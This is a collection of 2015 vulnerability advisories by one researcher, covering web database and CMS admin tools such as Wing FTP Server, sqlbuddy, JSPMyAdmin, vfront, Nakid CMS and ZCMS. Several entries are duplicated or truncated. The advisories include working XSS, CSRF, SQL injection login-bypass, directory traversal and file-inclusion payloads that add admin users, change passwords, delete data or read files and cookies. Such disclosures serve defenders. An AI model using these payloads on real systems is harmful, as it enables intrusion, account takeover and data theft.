CSRF & XSS Wing FTP Server Admin <= v4.4.5
Wing FTP Server Admin 4.4.5 - CSRF & Cross Site Scripting Vulnerabilities Release Date: = 2015-04-28 Source: http://hyp3rlinx.altervista.org/advisories/AS-WFTP0328.txt Common Vulnerability Scoring System: Overall CVSS Score 8.9 Product: === Wing FTP Server is a Web based administration FTP client that supports following protocols FTP, FTPS, HTTPS, SSH Advisory Information: == CSRF & client-side cross site scripting web vulnerability within Wing FTP Server Admin that allows adding arbitrary users to the system. Vulnerability Disclosure Timeline: == March 28, 2015: Vendor Notification March 28, 2015: Vendor Response/Feedback April 19, 2015: Vendor Notification April 28, 2015: Vendor released new version 4.4.6 April 28, 2015: Public Disclosure - John Page Affected Product(s): Wing FTP Server Admin 4.4.5 Product: Wing FTP Server - Admin Exploitation Technique: === Remote Severity Level: === High Technical Details & Description: Request Method(s): [+] POST & GET Vulnerable Product: [+] Wing FTP Server Admin <= 4.4.5 Vulnerable Parameter(s): [+] domain & type Affected Area(s): [+] Server Admin Proof of Concept (POC): === The CSRF and client-side cross site scripting web vulnerability can be exploited by remote attackers without privileged application user account and with low user interaction (click). Payload will add arbitrary users to the system. PoC: Example http://localhost:5466/admin_loglist.html?domain=[CSRF & XSS VULNERABILITIES] POC: Add arbitrary user: http://localhost:5466/admin_loglist.html?domain=%3Cscript%3EajaxRequest%28%27admin_adduser%27,%22domain%3dtest%26user%3d{%27username%27%3a%27hyp3rlinx%27,%27password%27%3a%27kuQrwgV%27,%27oldpassword%27%3a%27%27,%27max_download%27%3a%270%27,%27max_upload%27%3a%270%27,%27max_download_account%27%3a%270%27,%27max_upload_account%27%3a%270%27,%27max_connection%27%3a%270%27,%27connect_timeout%27%3a%275%27,%27idle_timeout%27%3a%275%27,%27connect_per_ip%27%3a%270%27,%27pass_length%27%3a%270%27,%27show_hidden_file%27%3a0,%27change_pass%27%3a0,%27send_message%27%3a0,%27ratio_credit%27%3a%270%27,%27ratio_download%27%3a%271%27,%27ratio_upload%27%3a%271%27,%27ratio_count_method%27%3a0,%27enable_ratio%27%3a0,%27current_quota%27%3a%270%27,%27max_quota%27%3a%270%27,%27enable_quota%27%3a0,%27note_name%27%3a%27%27,%27note_address%27%3a%27%27,%27note_zip%27%3a%27%27,%27note_phone%27%3a%27%27,%27note_fax%27%3a%27%27,%27note_email%27%3a%27%27,%27note_memo%27%3a%27%27,%27ipmasks%27%3a[],%27filemas ks%27%3a[],%27directories%27%3a[],%27usergroups%27%3a[],%27subdir_perm%27%3a[],%27enable_schedule%27%3a0,%27schedules%27%3a[],%27limit_reset_type%27%3a%270%27,%27limit_enable_upload%27%3a0,%27cur_upload_size%27%3a%270%27,%27max_upload_size%27%3a%270%27,%27limit_enable_download%27%3a0,%27cur_download_size%27%3a%270%27,%27max_download_size%27%3a%270%27,%27enable_expire%27%3a0,%27expiretime%27%3a%272015-05-18%2021%3a17%3a46%27,%27protocol_type%27%3a63,%27enable_password%27%3a1,%27enable_account%27%3a1,%27ssh_pubkey_path%27%3a%27%27,%27enable_ssh_pubkey_auth%27%3a0,%27ssh_auth_method%27%3a0}%22,%20%22post%22%29%3C/script%3E POC XSS: http://localhost:5466/admin_viewstatus.html?domain=[XSS VECTOR] POC XSS: http://localhost:5466/admin_event_list.html?type=[XSS VECTOR] Solution - Fix & Patch: === Vendor released updated version 4.4.6 Fix/Patch (Wing FTP Server) Security Risk: == The security risk of the CSRF client-side cross site scripting web vulnerability in the `domain` admin_loglist.html value has CVSS Score of 8.9 Credits & Authors: == John Page ( hyp3rlinx ) @apparitionsec Disclaimer & Information: = The information provided in this advisory is provided as it is without any warranty. the security research reporter John Page disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. apparitionsec or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages. Domains: hyp3rlinx.altervista.org
Sqlbuddy Directory Traversal Read Arbitrary Files Vulnerability
Sqlbuddy Directory Traversal Read Arbitrary Files Vulnerability. Vendor: http://www.sqlbuddy.com Release Date: = 05-08-2015 Source: http://hyp3rlinx.altervista.org/advisories/AS-SQLBUDDY0508.txt Product: === sqlbuddy version 1.3.3 SQL Buddy is an open source web based MySQL administration application. Advisory Information: == sqlbuddy suffers from directory traversal whereby a user can move about directories an read any PHP and non PHP files by appending the '#' hash character when requesting files via URLs. e.g. .doc, .txt, .xml, .conf, .sql etc... After adding the '#' character as a delimiter any non PHP will be returned and rendered by subverting the .php concatenation used by sqlbuddy when requesting PHP pages via POST method. Normal sqlbuddy request: http://localhost/sqlbuddy/home.php?ajaxRequest=666&requestKey= POC exploit payloads: === 1-Read from Apache restricted directory under htdocs: http://localhost/sqlbuddy/#page=../../../restricted/user_pwd.sql# 2-Read any arbitrary files that do not have .PHP extensions: http://localhost/sqlbuddy/#page=../../../directory/sensitive-file.conf# 3-Read phpinfo (no need for '#' as phpinfo is a PHP file): http://localhost/sectest/sqlbuddy/sqlbuddy/#page=../../../../xampp/phpinfo Disclosure Timeline: == Vendor Notification N/A May 8, 2015: Public Disclosure - hyp3rlinx Exploitation Technique: === Create a test file with non .php extension in some htdocs directory then request the page in the browser. http://localhost/sqlbuddy/sqlbuddy/#page=../../../test.txt# Severity Level: === High Description: == Request Method(s): [+] POST Vulnerable Product: [+] sqlbuddy 1.3.3 Vulnerable Parameter(s): [+] #page=somefile Affected Area(s): [+] Server directories & sensitive files Solution - Fix & Patch: === N/A Credits: John Page ( hyp3rlinx ) Disclaimer & Information: = The information provided in this advisory is provided as it is without any warranty. the security research reporter John Page disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. apparitionsec or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages. Domains: hyp3rlinx.altervista.org
Sidu 5.2 Admin XSS Vulnerability
Affected Vendor: www.topnew.net/sidu/ Credits: John Page ( hyp3rlinx ) Domains: hyp3rlinx.altervista.org Source: http://hyp3rlinx.altervista.org/advisories/AS-SIDU0513.txt Product: Sidu version 5.2 is a web based database front-end administration tool. Advisory Information: = Sidu 5.2 is vulnerable to cross site scripting attacks. Exploit code: == http://localhost/sidu52/sql.php?id=1&sql=%27%27%3Cscript%3Ealert%28%22XSS%20By%20hyp3rlinx%20\n05112015\n%22%2bdocument.cookie%29%3C/script%3E Disclosure Timeline: == Vendor Notification May 12, 2015 May 13, 2015: Public Disclosure Severity Level: === High Description: Request Method(s): [+] GET Vulnerable Product: [+] Sidu 5.2 Vulnerable Parameter(s): [+] sql=[XSS] Affected Area(s): [+] Admin of currently logged in user. == (hyp3rlinx)
DbNinja 3.2.6 Flash XSS Vulnerabilities
# Exploit Title: DbNinja Flash XSS Exploit # Google Dork: intitle: Flash XSS # Date: May 27, 2015 # Exploit Author: John Page (hyp3rlinx) # Website: hyp3rlinx.altervista.org # Vendor Homepage: www.dbninja.com # Software Link: www.dbninja.com # Version: 3.2.6 # Tested on: Windows 7 # Category: Flash XSS # CVE : NA Source: http://hyp3rlinx.altervista.org/advisories/AS-DBNINJA0527.txt Product: DbNinja is a web based application for MySQL database administration. Advisory Information: DbNinja multiple Flash based XSS vulnerabilities Vulnerability Details: = The DbNinja Flash uploader component contains 2 SWF files that use Flash 'ExternalInterface' API to call Javascript functions. These SWFs can be exploited by supplying malicious code as parameters to those functions from the URL. The text value "Copy to Clipboard" can also be changed using the "buttonText" parameter. Exploit code(s): === 1- http://localhost/dbninja/dbninja/js/lib/uploader.swf?selectCallback=alert(document.cookie) 2- http://localhost/dbninja/dbninja/js/lib/clipboard.swf?buttonText=DbNinja%20Login&dataSourceFunc=alert(document.cookie) 3- http://localhost/dbninja/dbninja/js/lib/clipboard.swf?completeCallback=alert(document.cookie) Disclosure Timeline: = Vendor Notification May 23, 2015 May 27, 2015: Public Disclosure Severity Level: = High Description: == Request Method(s): [+] GET Vulnerable Product: [+] DBNinja 3.2.6 Vulnerable Parameter(s): [+] selectCallback, dataSourceFunc & completeCallback Affected Area(s): [+] uploader.swf, clipboard.swf === (hyp3rlinx)
DbNinja 3.2.6 Flash XSS Vulnerabilities
# Exploit Title: DbNinja Flash XSS Exploit # Google Dork: intitle: Flash XSS # Date: May 27, 2015 # Exploit Author: John Page (hyp3rlinx) # Website: hyp3rlinx.altervista.org # Vendor Homepage: www.dbninja.com # Software Link: www.dbninja.com # Version: 3.2.6 # Tested on: Windows 7 # Category: Flash XSS # CVE : NA Source: http://hyp3rlinx.altervista.org/advisories/AS-DBNINJA0527.txt Product: DbNinja is a web based application for MySQL database administration. Advisory Information: DbNinja multiple Flash based XSS vulnerabilities Vulnerability Details: = The DbNinja Flash uploader component contains 2 SWF files that use Flash 'ExternalInterface' API to call Javascript functions. These SWFs can be exploited by supplying malicious code as parameters to those functions from the URL. The text value "Copy to Clipboard" can also be changed using the "buttonText" parameter. Exploit code(s): === 1- http://localhost/dbninja/dbninja/js/lib/uploader.swf?selectCallback=alert(document.cookie) 2- http://localhost/dbninja/dbninja/js/lib/clipboard.swf?buttonText=DbNinja%20Login&dataSourceFunc=alert(document.cookie) 3- http://localhost/dbninja/dbninja/js/lib/clipboard.swf?completeCallback=alert(document.cookie) Disclosure Timeline: = Vendor Notification May 23, 2015 May 27, 2015: Public Disclosure Severity Level: = High Description: == Request Method(s): [+] GET Vulnerable Product: [+] DBNinja 3.2.6 Vulnerable Parameter(s): [+] selectCallback, dataSourceFunc & completeCallback Affected Area(s): [+] uploader.swf, clipboard.swf === (hyp3rlinx)
JSPMyAdmin SQL Injection, CSRF & XSS Vulnerabilities
Credits: John Page ( hyp3rlinx ) Domains: hyp3rlinx.altervista.org Source: http://hyp3rlinx.altervista.org/advisories/AS-JSPMYADMIN0529.txt Vendor: code.google.com/p/jsp-myadmin Product: JSPAdmin 1.1 is a Java web based MySQL database management system. Advisory Information: JSPMyAdmin 1.1 SQL Injection, CSRF & XSS Vulnerabilities SQL Injection CSRF XSS Vulnerability Details: = SQL Injection: deletedata.jsp is supposed to delete 1 field per query, yet we can control the SQL and build an OR condition. Problem is application uses concatenated user input to build SQL statements even though paramaterized queries are used. In deletedata.jsp we find the following code: con.prepareStatement("DELETE FROM " + table + " WHERE "+ field + "='" + val +"'"); So expected SQL to be run is this deleting 1 record. e.g. http://localhost:8081/JSPMyAdmin/deletedata.jsp?db=test&table=email&field=CATID&val=7 But the SQL Injection vulnerability lets us instead drop all fields using an SQL 'OR' statement. e.g. http://localhost:8081/JSPMyAdmin/deletedata.jsp?db=test&table=email&field=CATID or 'field'='NAME' * CSRF: We can drop any database by sending victim malicious linx as there is no CSRF token used. * XSS: There is zero user input checks allowing remote attackers to execute arbitrary scripts in the context of an authenticated user's browser session. *** Exploit code(s): === SQL Injection POC: -- So expected SQL to be run is this deleting 1 record http://localhost:8081/JSPMyAdmin/deletedata.jsp?db=test&table=email&field=CATID&val=7 http://localhost:8081/JSPMyAdmin/deletedata.jsp?db=test&table=email&field=CATID or 'field'='NAME' CSRF POC: - http://127.0.0.1:8081/JSPMyAdmin/drop.jsp?db=mydb XSS(s) POC: -- 1- alert('XSS By hyp3rlinx'); Using POST method in 'host' parameter of login page. http://127.0.0.1:8081/JSPMyAdmin/ 2- http://127.0.0.1:8081/JSPMyAdmin/right.jsp?server=localhost&db="/>alert(666) 3- http://127.0.0.1:8081/JSPMyAdmin/right.jsp?server="/>alert(666)&db= 4- http://127.0.0.1:8081/JSPMyAdmin/tabledata.jsp?db="/>alert(666); 5- http://127.0.0.1:8081/JSPMyAdmin/tabledata.jsp?server=localhost&db=mysql&table="/>alert(666); 6- http://127.0.0.1:8081/JSPMyAdmin/tabledata.jsp?server="/>alert(666);&db= 7- http://127.0.0.1:8081/JSPMyAdmin/query.jsp?server="/>alert(666)&db= 8- http://127.0.0.1:8081/JSPMyAdmin/export.jsp?db=test&table=alert(666) Disclosure Timeline: = Vendor Notification: NA May 29, 2015: Public Disclosure Severity Level: = High Description: == Request Method(s): [+] GET / POST Vulnerable Product: [+] JSPMyAdmin 1.1 Vulnerable Parameter(s): [+] host, server, db, table Affected Area(s): [+] Entire admin === (hyp3rlinx)
Enhanced SQL Portal 5.0.7961 XSS Vulnerability
[+] Credits: John Page ( hyp3rlinx ) [+] Domains: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-ENHSQLPORTAL0602.txt Vendor: www.eliacom.com www.eliacom.com/mysql-gui-download.php Product: Enhanced SQL Portal 5.0.7961 web based MySQL administration application. Advisory Information: Enhanced SQL Portal 5.0.7961 XSS Vulnerability Vulnerability Details: = iframe.php contains an XSS vulnerability Exploit code(s): === http://localhost/Enhanced_SQL_Portal_5.0.7961_05_06_2015/iframe.php?id="/>alert(666) Disclosure Timeline: = Vendor Notification: May 28, 2015 June 2, 2015 : Public Disclosure Severity Level: = Med Description: == Request Method(s): [+] GET Vulnerable Product: [+] Enhanced SQL Portal 5.0.7961 Vulnerable Parameter(s): [+] id Affected Area(s): [+] iframe === (hyp3rlinx)
vfront-0.99.2 CSRF & Persistent XSS
[+] Credits: John Page ( hyp3rlinx ) [+] Domains: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-VFRONT0602.txt Vendor: == www.vfront.org Product: === vfront-0.99.2 is a PHP web based MySQL & PostgreSQL database management application. Advisory Information: CSRF, Persistent XSS & reflected XSS Vulnerability Detail(s): === CSRF: = No CSRF token in place, therefore we can add arbitrary users to the system. Persistent XSS: variabili.php has multiple XSS vectors using POST method, one input field 'altezza_iframe_tabella_gid' will store XSS payload into the MySQL database which will be run each time variabili.php is accessed from victims browser. Persisted XSS stored in MySQL DB: = DB-> vfront_vfront TABLE-> variabili COLUMN--> valore (will contain our XSS) Exploit code(s): === CSRF code add arbitrary users to system: === http://localhost/vfront-0.99.2/vfront-0.99.2/admin/log.php?op="/>var xhr%3dnew XMLHttpRequest();xhr.onreadystatechange%3dfunction(){if(xhr.status%3d%3d200){if(xhr.readyState%3d%3d4){alert(xhr.responseText);}}};xhr.open('POST','utenze.db.php?insert_new',true);xhr.setRequestHeader('Content-type','application/x-www-form-urlencoded');xhr.send('nome%3dhyp3rlinxe%26cognome%3dapparitionsec%26email%...@x.com%26passwd%3dhacked%26passwd1%3dhacked');&tabella=&uid=&data_dal=All&data_al=All Persistent XSS: http://localhost/vfront-0.99.2/vfront-0.99.2/admin/variabili.php?feed=0&gidfocus=0 Inject XSS into 'the altezza_iframe_tabella_gid' input field to store in database. "/>alert(666) Reflected XSS(s): = http://localhost/vfront-0.99.2/vfront-0.99.2/admin/query_editor.php?id=&id_table=&id_campo="/>alert(666) XSS vulnerable input fields: http://localhost/vfront-0.99.2/vfront-0.99.2/admin/variabili.php altezza_iframe_tabella_gid <- ( Persistent XSS ) passo_avanzamento_veloce_gid n_record_tabella_gid search_limit_results_gid max_tempo_edit_gid home_redirect_gid formati_attach_gid default_group_ext_gid cron_days_min_gid Disclosure Timeline: === Vendor Notification: May 31, 2015 June 2, 2015 : Public Disclosure Severity Level: === High Description: == Request Method(s): [+] GET & POST Vulnerable Product: [+] vfront-0.99.2 Vulnerable Parameter(s): [+] altezza_iframe_tabella_gid passo_avanzamento_veloce_gid n_record_tabella_gid search_limit_results_gid max_tempo_edit_gid home_redirect_gid formati_attach_gid default_group_ext_gid cron_days_min_gid id_campo op Affected Area(s): [+] Admin & MySQL DB === (hyp3rlinx)
Symphony CMS 2.6.2
[+] Credits: John Page ( hyp3rlinx ) [+] Domains: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-SYMPHONY0606.txt Vendor: www.getsymphony.com/download/ Product: Symphony CMS 2.6.2 Advisory Information: Symphony CMS XSS Vulnerability Vulnerability Details: = The 'sort' parameter used by author search in Admin is XSS exploitable. Symphony seems to escape injected strings e.g. 'HELL' becomes \'HELL\' but we can easily defeat that using Javascript functions charCodeAt() & fromCharCode() e.g. String.fromCharCode(72,69,76,76) Now we can output our 'HELL' strings, construct URLs etc... Exploit XSS code(s): http://localhost/symphony-2.6.2/symphony/system/authors/?sort=alert(String.fromCharCode(72,69,76,76))&order=asc Disclosure Timeline: = Vendor Notification: June 5, 2015 June 6, : Public Disclosure Severity Level: = Med Description: == Request Method(s): [+] GET Vulnerable Product: [+] Symphony CMS 2.6.2 Vulnerable Parameter(s): [+] sort Affected Area(s): [+] symphony/system/authors/ === (hyp3rlinx)
Symphony CMS XSS Vulnerability
[+] Credits: John Page ( hyp3rlinx ) [+] Domains: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/ Vendor: http://www.silverstripe.org/software/download Product: SilverStripe CMS & Framework v3.1.13 Advisory Information: Unvalidated redirect & XSS vulnerabilities Vulnerability Details: = Unvalidated redirect XSS (reflected): Exploit code(s): === Unvalidated redirect POC: -- http://localhost/SilverStripe-cms-v3.1.13/dev/build?returnURL=[EVIL REMOTE FILE LOCATION] XSS(s) POC: -- Disclosure Timeline: = Vendor Notification: June 7, 2015 : Public Disclosure Severity Level: = High Description: == Request Method(s): [+] GET & POST Vulnerable Product:[+] SilverStripe CMS & Framework v3.1.13 Vulnerable Parameter(s): [+] Affected Area(s): [+] === [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. (hyp3rlinx)
Symphony CMS XSS Vulnerability [Corrected Post]
[Correction] of Vendor Info for Symphony CMS XSS Vulnerability POST on (Jun 08) = [+] Credits: John Page ( hyp3rlinx ) [+] Domains: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-SYMPHONY0606.txt Vendor: www.getsymphony.com/download/ Product: Symphony CMS 2.6.2 Advisory Information: Symphony CMS XSS Vulnerability Vulnerability Details: = The 'sort' parameter used by author search in Admin is XSS exploitable. Symphony seems to escape injected strings e.g. 'HELL' becomes \'HELL\' but we can easily defeat that using Javascript functions charCodeAt() & fromCharCode() e.g. String.fromCharCode(72,69,76,76) Now we can output our 'HELL' strings, construct URLs etc... Exploit XSS code(s): http://localhost/symphony-2.6.2/symphony/system/authors/?sort=alert(String.fromCharCode(72,69,76,76))&order=asc Disclosure Timeline: = Vendor Notification: June 5, 2015 June 6, : Public Disclosure Severity Level: = Med Description: == Request Method(s): [+] GET Vulnerable Product: [+] Symphony CMS 2.6.2 Vulnerable Parameter(s): [+] sort Affected Area(s): [+] symphony/system/authors/ === (hyp3rlinx)
SilverStripe CMS Unvalidated Redirect & XSS vulnerabilities
[+] Credits: hyp3rlinx [+] Domains: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-SILVERSTRIPE0607.txt Vendor: http://www.silverstripe.org/software/download Product: SilverStripe CMS & Framework v3.1.13 Advisory Information: === Unvalidated redirect & XSS vulnerabilities Vulnerability Details: = Unvalidated redirect: The 'returnURL' parameter for following URL: http://localhost/SilverStripe-cms-v3.1.13/dev/build is open to abuse by supplying an malicious a location or file. XSS (reflected): install.php is XSS vulnerable using POST method for the following input fields. admin_username admin_password Exploit code(s): === Unvalidated redirect POC: http://localhost/SilverStripe-cms-v3.1.13/dev/build?returnURL=[EVIL REMOTE FILE LOCATION] XSS POC: http://localhost/SilverStripe-cms-v3.1.13/install.php admin_username admin_password ">alert(666) Disclosure Timeline: === Vendor Notification: June 7, 2015 June 8, 2015 : Public Disclosure Severity Level: === Med Description: === Request Method(s): [+] GET & POST Vulnerable Product:[+] SilverStripe CMS & Framework v3.1.13 Vulnerable Parameter(s): [+] returnURL, admin_username & admin_password Affected Area(s): [+] install & dev === [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. (hyp3rlinx)
SilverStripe CMS Unvalidated Redirect & XSS vulnerabilities
[+] Credits: hyp3rlinx [+] Domains: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-SILVERSTRIPE0607.txt Vendor: http://www.silverstripe.org/software/download Product: SilverStripe CMS & Framework v3.1.13 Advisory Information: === Unvalidated redirect & XSS vulnerabilities Vulnerability Details: = Unvalidated redirect: The 'returnURL' parameter for following URL: http://localhost/SilverStripe-cms-v3.1.13/dev/build is open to abuse by supplying an malicious a location or file. XSS (reflected): install.php is XSS vulnerable using POST method for the following input fields. admin_username admin_password Exploit code(s): === Unvalidated redirect POC: http://localhost/SilverStripe-cms-v3.1.13/dev/build?returnURL=[EVIL REMOTE FILE LOCATION] XSS POC: http://localhost/SilverStripe-cms-v3.1.13/install.php admin_username admin_password ">alert(666) Disclosure Timeline: === Vendor Notification: June 7, 2015 June 8, 2015 : Public Disclosure Severity Level: === Med Description: === Request Method(s): [+] GET & POST Vulnerable Product:[+] SilverStripe CMS & Framework v3.1.13 Vulnerable Parameter(s): [+] returnURL, admin_username & admin_password Affected Area(s): [+] install & dev === [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. (hyp3rlinx)
Nakid-CMS CSRF, Persistent XSS & LFI
[+] Credits: John Page ( hyp3rlinx ) [+] Domains: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-NAKIDCMS0611.txt Vendor: http://kilrizzy.github.io/Nakid-CMS/ Product: kilrizzy-Nakid-CMS-f274624 Nakid CMS is an open source content management system built using PHP and CodeIgniter. Setup mode: == Under root dir for Nakid CMS we set to production mode instead of development in index.php. e.g. define('ENVIRONMENT', 'production'); Advisory Information: CSRF, Persistent XSS & Auth bypass LFI Vulnerability Details: = Multiple CSRF(s) exist: We have ability to do the following as no CSRF tokens are present. 1-Change Admin password 2-Add arbitrary users to system 3-Alter system settings XSS (persistent): XSS parameter vulnerabilities exist for the following: payloads will be stored in the MySQL database and activated when a victim visits the vulnerable webpage. XSS URL: http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/users On the "Edit Record" pop up dialog box. Vulnerable parameters: - username password email fname lname XSS URL: http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/settings On the "Edit Record" pop up dialog box. Vulnerable parameters: - from_name include_path primary_email from_email XSS URL: http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/content_edit/1 Vulnerable parameter: title Authentication bypass LFI: Local file inclusion to bypass access controls and read aribitrary files exist by setting '$url' PHP variable on following URL index.php/connector$url Exploit POC code(s): CSRF(s): Condition: Pursuade victim to visit our webpage or click our link, if they have a session then we do our CSRF!. 1- Add arbitrary user to system function doit(){ var e=document.getElementById('ruinurlife') e.submit() } http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/grid/users"; method="post"> 2-Change Admin password function doit(){ var e=document.getElementById('ruinurlife') e.submit() } http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/profile"; method="post"> 3-Alter system settings --- function doit(){ var e=document.getElementById('ruinurlife') e.submit() } http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/grid/settings"; method="post"> XSS persistent POC code: === Inject alert(666) into any of the following vulnerable fields described above using POST method. Need to highlight a row then click edit dialog box to edit settings. e.g. http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/system/settings from_name <--- alert(666) include_path primary_email from_email Authorization bypass LFI: 1- Logout, create a hell.txt file or whatever and put in 'htdocs' or web root, then visit the URL (change to suit your environment). 2- http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/connector$url=../../../../../../../hell.txt OR try http://localhost/kilrizzy-Nakid-CMS-f274624/kilrizzy-Nakid-CMS-f274624/index.php/connector$url=../../../../../../xampp/phpinfo.php Disclosure Timeline: = Vendor Notification: NA June 11, 2015 : Public Disclosure Severity Level: = High Description: == Request Method(s): [+] GET & POST Vulnerable Product:[+] kilrizzy-Nakid-CMS-f274624 Vulnerable Parameter(s): [+] username password email fname lname from_name include_path primary_email from_email title connector$url Affected Area(s): [+] /system/users /system/profile /system/content_edit/ === [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission i
ZCMS SQL Injection & Persistent XSS
[+] Credits: John Page ( hyp3rlinx ) [+] Domains: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-ZCMS0612.txt Vendor: = http://zencherry.com/ http://sourceforge.net/projects/zencherrycms Product: == ZCMS 1.1 JavaServer Pages Content Management System Advisory Information: == SQL Injection & Persistent XSS Vulnerability Details: == SQL Injection: Login to admin area requires a password but is easily bypassed using classic SQLInjection method because application uses concatenated user input to construct SQL queries. ZCMS exploitable admin login code: == squerry="SELECT COUNT(username) AS usercount FROM "+TABLE_PREFIX+"users WHERE status = 0 AND username = '"+username+"' AND password = '"+request.getParameter("pass") +"' AND type = 1 ;"; So we just supply an Admin password like ---> HELL' OR '2'='2 which will resolve as true! SQL Inject XSS Payload: === We can also inject persisten XSS payload directly to MySQL database subverting all character filtering leveraging existing SQLInjection vulnerabilities. Persistent XSS: === Another persistent XSS vector is here in author field for comments: http://localhost:8081/ZCMS_1.1/ZCMS_1.1/index.jsp?dir=editpost&p=[page number] Exploit code(s): === 1) Bypass admin login - localhost:8081/ZCMS_1.1/ZCMS_1.1/?dir=login Enter 'admin' for username field Enter HELL' OR '2'='2 for the pass field 2) Inject XSS using SQL Injection - http://localhost:8081/ZCMS_1.1/ZCMS_1.1/?dir=editpost&p=1&title=";alert(1) &content=alert(1)&author=alert(1) SATAN&visibility=1&type=1&comm=0 3) Persistent XSS field --- http://localhost:8081/ZCMS_1.1/ZCMS_1.1/index.jsp?dir=editpost&p=[page number] Inject alert(666) in author input field. Disclosure Timeline: = Vendor Notification: NA June 12, 2015 : Public Disclosure Severity Level: = High Description: == Request Method(s): [+] GET & POST Vulnerable Product:[+] ZCMS_1.1 Vulnerable Parameter(s): [+] pass, title, content, author Affected Area(s): [+] Admin, CMS === [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. (hyp3rlinx)
mysql-lite-administrator XSS vulnerabilities
[+] Credits: hyp3rlinx [+] Domains: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-MYSQLLITEADMINISTRATOR0621.txt Vendor: = code.google.com/p/mysql-lite-administrator Product: == mysql-lite-administrator(beta1) Advisory Information: == Multiple XSS vulnerabilities Vulnerability Details: == mysql-lite-administrator is vulnerable to XSS attacks, the application escapes injected strings. e.g. 'HELL' becomes \'HELL\' but we can easily defeat that using Javascript functions String.charCodeAt() & String.fromCharCode() XSS Exploit code(s): http://localhost/mysql-lite-administrator(beta1)/tabella.php?table_name=alert(String.fromCharCode(72,69,76,76)) http://localhost/mysql-lite-administrator(beta1)/coloni.php?num_row=1&table_name=alert(666) http://localhost/mysql-lite-administrator(beta1)/coloni.php?num_row=">alert(String.fromCharCode(72,69,76,76)) http://localhost/mysql-lite-administrator(beta1)/insert.php?table_name=alert(666) Disclosure Timeline: = Vendor Notification: NA June 21, 2015 : Public Disclosure Severity Level: = Med Description: == Request Method(s): [+] GET Vulnerable Product:[+] mysql-lite-administrator (beta1) Vulnerable Parameter(s): [+] table_name, num_row Affected Area(s): [+] tabella.php & coloni.php === [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. (hyp3rlinx)
mysql-lite-administrator XSS vulnerabilities
[+] Credits: hyp3rlinx [+] Domains: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-MYSQLLITEADMINISTRATOR0621.txt Vendor: = code.google.com/p/mysql-lite-administrator Product: == mysql-lite-administrator(beta1) Advisory Information: == Multiple XSS vulnerabilities Vulnerability Details: == mysql-lite-administrator is vulnerable to XSS attacks, the application escapes injected strings. e.g. 'HELL' becomes \'HELL\' but we can easily defeat that using Javascript functions String.charCodeAt() & String.fromCharCode() XSS Exploit code(s): http://localhost/mysql-lite-administrator(beta1)/tabella.php?table_name=alert(String.fromCharCode(72,69,76,76)) http://localhost/mysql-lite-administrator(beta1)/coloni.php?num_row=1&table_name=alert(666) http://localhost/mysql-lite-administrator(beta1)/coloni.php?num_row=">alert(String.fromCharCode(72,69,76,76)) http://localhost/mysql-lite-administrator(beta1)/insert.php?table_name=alert(666) Disclosure Timeline: = Vendor Notification: NA June 21, 2015 : Public Disclosure Severity Level: = Med Description: == Request Method(s): [+] GET Vulnerable Product:[+] mysql-lite-administrator (beta1) Vulnerable Parameter(s): [+] table_name, num_row Affected Area(s): [+] tabella.php & coloni.php === [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein 